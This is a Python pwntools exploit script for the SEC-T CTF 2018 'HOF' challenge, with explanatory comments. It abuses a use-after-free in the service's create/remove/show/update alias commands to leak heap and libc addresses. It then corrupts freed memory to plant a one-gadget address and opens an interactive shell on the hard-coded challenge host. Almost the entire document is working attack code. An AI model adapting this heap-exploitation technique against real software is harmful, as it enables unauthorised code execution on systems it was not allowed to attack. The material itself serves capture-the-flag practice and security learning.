SEC-T CTF 2018 (HOF)
from pwn import *
import re
def update(alias, name, desc, cash):
    """Walk the service's `update <alias>` dialogue on the global `p` connection.

    Waits for the `> ` prompt, sends the command, then answers the
    `Name: `, `Desc: ` and `Cash: ` prompts in that order with *name*,
    *desc* and `str(cash)`. Returns nothing; every line is sent as given.
    """
    p.recvuntil('> ')
    p.sendline('update %s' % alias)
    # Prompt/answer pairs, in the order the service asks for them.
    dialogue = (
        ('Name: ', name),
        ('Desc: ', desc),
        ('Cash: ', str(cash)),
    )
    for prompt, answer in dialogue:
        p.recvuntil(prompt)
        p.sendline(answer)
def show(alias):
    """Send `show <alias>` on the global `p` connection and return the reply.

    The returned value is the raw output read up to and including the
    string `Options`; callers parse it themselves.
    """
    p.recvuntil('> ')
    p.sendline('show %s' % alias)
    reply = p.recvuntil('Options')
    return reply
def alias(name, desc, alias):
    """Walk the service's `create <alias>` dialogue on the global `p` connection.

    Note the argument order (name, desc, alias): the alias comes last,
    while the `update` helper takes it first. Answers the `Name: ` and
    `Desc: ` prompts with *name* and *desc*; returns nothing.
    """
    p.recvuntil('> ')
    p.sendline('create %s' % alias)
    # Two prompts follow the command; answer each in turn.
    for prompt, answer in (('Name: ', name), ('Desc: ', desc)):
        p.recvuntil(prompt)
        p.sendline(answer)
def freealias(alias):
    """Send `remove <alias>` on the global `p` connection once the prompt is back."""
    command = 'remove %s' % alias
    p.recvuntil('> ')
    p.sendline(command)
def exploit():
    """Drive the remote service over the global `p` connection.

    As written: create and remove aliases, then `show` / `update` aliases
    that were already removed; the bytes after `Desc: ` in two such replies
    are unpacked as 64-bit integers and logged as `Heap` and `Libc`; later
    payloads embed values derived from those integers. Every size, count
    and offset below is hard-coded for one specific target build and is not
    derivable from this file. Ends by handing the session to the user.
    """
    # Create one alias, remove it, then `show` it anyway and read the Desc
    # field of the reply. NOTE(review): the service answering `show` for a
    # removed alias is what this whole script depends on; the bytes are
    # treated as a heap address — confirm against the target binary.
    alias('Aa', 'A'*0x40, 'a')
    freealias('a')
    # `[0]` raises IndexError if the reply has no `Desc: ` line (script stops noisily).
    heap = re.findall('Desc: (.*)', show('a'))[0]
    # Right-pad to 8 bytes and unpack with pwntools' u64 (endianness follows
    # its context; little-endian by default). More than 8 bytes would raise.
    heap = u64(heap.ljust(8,'\x00'))
    log.info('Heap : %s ' % hex(heap))
    # Eight 0x50-byte aliases a0..a7, created then removed in order.
    for i in range(8):
        alias('A%d'%i,'A'*0x50,'a%d'%i)
    for i in range(8):
        freealias('a%d'%i)
    # Eight 0x90-byte aliases b0..b7, one 0x30-byte alias 'b', then remove b0..b7.
    # The sizes/counts presumably target the allocator's behaviour — not derivable here.
    for i in range(8):
        alias('A%d'%i,'A'*0x90,'b%d'%i)
    alias('Ab','A'*0x30,'b')
    for i in range(8):
        freealias('b%d'%i)
    # Same read-back of a removed alias as above; this value is logged as `Libc`.
    libc = re.findall('Desc: (.*)', show('b7'))[0]
    libc = u64(libc.ljust(8,'\x00'))
    log.info('Libc : %s' % hex(libc))
    # Seven 0x40-byte aliases c0..c6, then 'd1' (0x40 bytes), which is removed.
    for i in range(7):
        alias('B%d'%i, 'B'*0x40, 'c%d'%i)
    alias('Ad', 'E'*0x40, 'd1')
    freealias('d1')
    # Hard-coded constant; the name suggests an offset relative to the leaked
    # libc value. Specific to the target's libc build — confirm.
    oneGoffset = 0x4f322
    # Two `update` calls on the already-removed 'd1': first a 36-byte Desc,
    # then a packed 64-bit value derived from the libc leak (0x92 is a
    # target-specific constant).
    update('d1','Ad', 'A'*6 + '\x00'*30,1)
    update('d1','Ad', p64(libc - 0x92) ,1)
    alias('Ae','A'*0x30 ,'e')
    # 0x70 and 0x3ebc30 are likewise target-specific; no way to verify them here.
    hack = libc - 0x70 - 0x3ebc30 + oneGoffset
    # The Name field of this alias carries the packed `hack` value after 26 filler bytes.
    alias('A'*26 + p64(hack),'A'+'\x00'*0x40 ,'f')
    p.interactive()
if __name__ == '__main__':
    # Target is hard-coded. `p` is module-global: every helper above reads it.
    # Written against the Python 2 / str-based pwntools API ('\x00' padding,
    # str regexes on received data); it would need bytes payloads on Python 3.
    target_host, target_port = 'pwn2.sect.ctf.rocks', 2024
    p = remote(target_host, target_port)
    pause()
    exploit()